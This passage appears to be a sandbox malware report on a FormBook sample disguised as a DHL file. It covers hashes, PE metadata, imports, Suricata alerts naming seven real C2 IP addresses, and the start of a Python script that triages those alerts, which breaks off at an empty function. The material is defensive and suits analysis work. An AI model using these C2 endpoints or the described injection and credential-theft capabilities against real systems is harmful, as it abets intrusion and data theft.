                                                                                      SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                                                                                      SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                                                                                      SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                                                                                      Malicious:false
                                                                                      Reputation:moderate, very likely benign file
                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\DHL 30312052024.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):270848
                                                                                      Entropy (8bit):7.993413433199171
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:fsoRQt12GWUqr1E4tECDm4tm//ugAZwGtS2uw8KWz3nict:fHuQDGCD7E/iDuwpeht
                                                                                      MD5:F7AC0B63E89E78C46408AAA010A6B30C
                                                                                      SHA1:AC3B177598BFF46B4276D436BABB86B79F18439A
                                                                                      SHA-256:16E2B22C2B9BA7E8CD830704110E4AE782989C1357C857BD690B27C949D502E3
                                                                                      SHA-512:0E4CB286A662737D30B090C689D522FF2975E7FDCBE6AAD6DDCCE5B6AFAEA9661DD2263151A95375EB0C08424CE25BF86C1BE68B9617D6ABC7F78B15D0EA4219
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{l.c.0YBD...9.....11..lHF...BW66Q120YBDKN90XBW66Q120YBDKN9.XBW8).?2.P.e.Ou.y.?_EqA@_>0%&nZQ6,8B.3T.B,,d" .t..w[Y5T.=TH`KN90XBWO7X..P>.y+)..8%.,....P>.^....8%.,....P>.."-Q.8%.66Q120YB..N9|YCW.^.n20YBDKN9.X@V=7Z12 ]BDKN90XBW.#Q12 YBDkJ90X.W6&Q122YBBKN90XBW06Q120YBDkJ90ZBW66Q100..DK^90HBW66A12 YBDKN9 XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW.B4IF0YB.DJ90HBW6&U12 YBDKN90XBW66Q1.0Y"DKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YBDKN90XBW66Q120YB
                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):7.189598107604616
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:DHL 30312052024.exe
                                                                                      File size:1'208'832 bytes
                                                                                      MD5:e414a371a1be9843ba41ad3b33b1d734
                                                                                      SHA1:9cea807095b000923036736217baabec3af1755e
                                                                                      SHA256:80f9730a0f5124c24863e93b5e6b1b3dc653cc68c12055d9d7309fa636626ae8
                                                                                      SHA512:a3ba878a28891aadcadbb584e26334d97b202f64b0ef399710c30cc61a4eddede67cd9d0af26d0ecd41ed1c33f935850b3b11a9419c7fce6b81c36dcfb2a2918
                                                                                      SSDEEP:24576:eu6J33O0c+JY5UZ+XC0kGso6Fa/93gdmlbQbGROp2ezkmWY:wu0c++OCvkGs9Fa/J6EoGRnY
                                                                                      TLSH:4445BE22B3DDC361CB669173BF69B7016EBF38710630B95B2F880D7DA950162162D7A3
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                                                      Icon Hash:aaf3e3e3938382a0
                                                                                      Entrypoint:0x427dcd
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x6752434F [Fri Dec 6 00:20:31 2024 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:5
                                                                                      OS Version Minor:1
                                                                                      File Version Major:5
                                                                                      File Version Minor:1
                                                                                      Subsystem Version Major:5
                                                                                      Subsystem Version Minor:1
                                                                                      Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                                      Instruction
                                                                                      call 00007FF930F25F3Ah
                                                                                      jmp 00007FF930F18D04h
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      push edi
                                                                                      push esi
                                                                                      mov esi, dword ptr [esp+10h]
                                                                                      mov ecx, dword ptr [esp+14h]
                                                                                      mov edi, dword ptr [esp+0Ch]
                                                                                      mov eax, ecx
                                                                                      mov edx, ecx
                                                                                      add eax, esi
                                                                                      cmp edi, esi
                                                                                      jbe 00007FF930F18E8Ah
                                                                                      cmp edi, eax
                                                                                      jc 00007FF930F191EEh
                                                                                      bt dword ptr [004C31FCh], 01h
                                                                                      jnc 00007FF930F18E89h
                                                                                      rep movsb
                                                                                      jmp 00007FF930F1919Ch
                                                                                      cmp ecx, 00000080h
                                                                                      jc 00007FF930F19054h
                                                                                      mov eax, edi
                                                                                      xor eax, esi
                                                                                      test eax, 0000000Fh
                                                                                      jne 00007FF930F18E90h
                                                                                      bt dword ptr [004BE324h], 01h
                                                                                      jc 00007FF930F19360h
                                                                                      bt dword ptr [004C31FCh], 00000000h
                                                                                      jnc 00007FF930F1902Dh
                                                                                      test edi, 00000003h
                                                                                      jne 00007FF930F1903Eh
                                                                                      test esi, 00000003h
                                                                                      jne 00007FF930F1901Dh
                                                                                      bt edi, 02h
                                                                                      jnc 00007FF930F18E8Fh
                                                                                      mov eax, dword ptr [esi]
                                                                                      sub ecx, 04h
                                                                                      lea esi, dword ptr [esi+04h]
                                                                                      mov dword ptr [edi], eax
                                                                                      lea edi, dword ptr [edi+04h]
                                                                                      bt edi, 03h
                                                                                      jnc 00007FF930F18E93h
                                                                                      movq xmm1, qword ptr [esi]
                                                                                      sub ecx, 08h
                                                                                      lea esi, dword ptr [esi+08h]
                                                                                      movq qword ptr [edi], xmm1
                                                                                      lea edi, dword ptr [edi+08h]
                                                                                      test esi, 00000007h
                                                                                      je 00007FF930F18EE5h
                                                                                      bt esi, 03h
                                                                                      jnc 00007FF930F18F38h
                                                                                      Programming Language:
                                                                                      • [ASM] VS2013 build 21005
                                                                                      • [ C ] VS2013 build 21005
                                                                                      • [C++] VS2013 build 21005
                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                      • [ASM] VS2013 UPD4 build 31101
                                                                                      • [RES] VS2013 build 21005
                                                                                      • [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x5e90c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x126000 | 0x711c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x5e90c | 0x5ea00 | 464fdbad9ff9b491432e22823af1e342 | False | 0.9306060105680317 | data | 7.899761227804893 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x126000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcf7b8 | 0x55bd1 | data | | | 1.000330310235346
RT_GROUP_ICON | 0x12538c | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x125404 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x125418 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x12542c | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x125440 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x12551c | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Note: this is the import table of the AutoIt3 interpreter itself (WinSock, WinINet, MPR drive mapping, IcmpSendEcho, mciSendStringW, BlockInput, SendInput, CreateProcessWithLogonW, VirtualAllocEx and WriteProcessMemory all back AutoIt built-in functions), so it describes what the runtime can do, not what this particular script does. The static capability signatures above (block mouse and keyboard input, read the clipboard, IsDebuggerPresent, call native functions) derive from it; the behaviour that matters for triage is the dynamic evidence (thread and APC injection, credential harvesting, and the FormBook C2 check-ins below).
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-06T17:43:39.116072+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.9 | 49782 | 154.215.72.110 | 80 | TCP
2024-12-06T17:44:13.060877+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.9 | 49865 | 116.50.37.244 | 80 | TCP
2024-12-06T17:45:36.259355+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.9 | 49921 | 85.159.66.93 | 80 | TCP
2024-12-06T17:45:51.066808+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.9 | 49986 | 91.195.240.94 | 80 | TCP
2024-12-06T17:46:14.625193+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.9 | 49990 | 66.29.149.46 | 80 | TCP
2024-12-06T17:46:30.078407+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.9 | 49994 | 195.110.124.133 | 80 | TCP
2024-12-06T17:47:01.525322+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.9 | 49998 | 217.196.55.202 | 80 | TCP
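The alert table above is what a SOC sees once this sample runs on a monitored host, usually as Suricata EVE JSON rather than a rendered table. The following is an added example written for this page, not code from Joe Sandbox, Suricata or Emerging Threats: it reads eve.json alert records, keeps only the FormBook check-in SID from the table (2050745; other ET FormBook SIDs are not assumed), and aggregates them into per-endpoint indicators with first/last seen, victim hosts and the client ports needed to pull the exact flows from the packet capture. The EVE lines are constructed from the table's own values (the "flow" record, the SID 2000000 alert and the truncated last line are constructed noise for the filter to reject); the field names follow Suricata's EVE alert schema.

```python
"""Triage Suricata EVE alerts for FormBook C2 check-ins.

Added example (editor-written, not part of the Joe Sandbox report, Suricata or
the ET ruleset). Reads eve.json alert records, keeps the FormBook check-in
signature from the report's alert table and aggregates them per C2 endpoint.
"""
import json
from datetime import datetime

# Only the SID that appears in the report's alert table; treating other ET
# FormBook SIDs as equivalent would be an assumption, so they are not listed.
FORMBOOK_SIDS = {2050745}

# Constructed EVE JSON lines modelled on the report's alert table (same SID,
# signature, IPs, ports and timestamps). The "flow" record, the SID 2000000
# alert and the truncated last line are constructed noise for the filter.
SAMPLE_EVE = "\n".join([
    '{"timestamp":"2024-12-06T17:43:39.116072+0100","flow_id":1,"event_type":"alert","src_ip":"192.168.2.9","src_port":49782,"dest_ip":"154.215.72.110","dest_port":80,"proto":"TCP","alert":{"signature_id":2050745,"signature":"ET MALWARE FormBook CnC Checkin (GET) M5","severity":1}}',
    '{"timestamp":"2024-12-06T17:43:39.239157+0100","flow_id":1,"event_type":"flow","src_ip":"192.168.2.9","src_port":49782,"dest_ip":"154.215.72.110","dest_port":80,"proto":"TCP"}',
    '{"timestamp":"2024-12-06T17:44:13.060877+0100","flow_id":2,"event_type":"alert","src_ip":"192.168.2.9","src_port":49865,"dest_ip":"116.50.37.244","dest_port":80,"proto":"TCP","alert":{"signature_id":2050745,"signature":"ET MALWARE FormBook CnC Checkin (GET) M5","severity":1}}',
    '{"timestamp":"2024-12-06T17:45:36.259355+0100","flow_id":3,"event_type":"alert","src_ip":"192.168.2.9","src_port":49921,"dest_ip":"85.159.66.93","dest_port":80,"proto":"TCP","alert":{"signature_id":2050745,"signature":"ET MALWARE FormBook CnC Checkin (GET) M5","severity":1}}',
    '{"timestamp":"2024-12-06T17:45:51.066808+0100","flow_id":4,"event_type":"alert","src_ip":"192.168.2.9","src_port":49986,"dest_ip":"91.195.240.94","dest_port":80,"proto":"TCP","alert":{"signature_id":2050745,"signature":"ET MALWARE FormBook CnC Checkin (GET) M5","severity":1}}',
    '{"timestamp":"2024-12-06T17:45:52.000000+0100","flow_id":5,"event_type":"alert","src_ip":"192.168.2.9","src_port":49987,"dest_ip":"203.0.113.7","dest_port":80,"proto":"TCP","alert":{"signature_id":2000000,"signature":"CONSTRUCTED noise alert, not from the report","severity":3}}',
    'this line is deliberately truncated {"event_type":"alert"',
])


def parse_eve(text):
    """Decode one JSON object per line. Blank and malformed lines are skipped:
    a torn last line is normal when eve.json is read while Suricata is still
    appending to it, and must not abort the whole triage run."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            records.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return records


def formbook_alerts(records, sids=FORMBOOK_SIDS):
    """Keep alert records whose signature_id is a FormBook check-in SID."""
    return [r for r in records
            if r.get("event_type") == "alert"
            and r.get("alert", {}).get("signature_id") in sids]


def parse_ts(ts):
    # Suricata writes the offset as "+0100" without a colon; %z accepts that.
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z")


def c2_summary(alerts):
    """Aggregate alerts per C2 endpoint (dest_ip, dest_port, proto).

    The ET check-in rule fires on the infected host's outbound GET, so src_ip is
    the victim and dest_ip the C2. Victims and client ports are kept so the
    responder can select the exact TCP flows from the capture.
    """
    out = {}
    for a in alerts:
        key = (a["dest_ip"], a["dest_port"], a["proto"])
        ts = parse_ts(a["timestamp"])
        e = out.setdefault(key, {"hits": 0, "first_seen": ts, "last_seen": ts,
                                 "victims": set(), "client_ports": []})
        e["hits"] += 1
        e["first_seen"] = min(e["first_seen"], ts)
        e["last_seen"] = max(e["last_seen"], ts)
        e["victims"].add(a["src_ip"])
        e["client_ports"].append(a["src_port"])
    return out


def c2_blocklist(summary):
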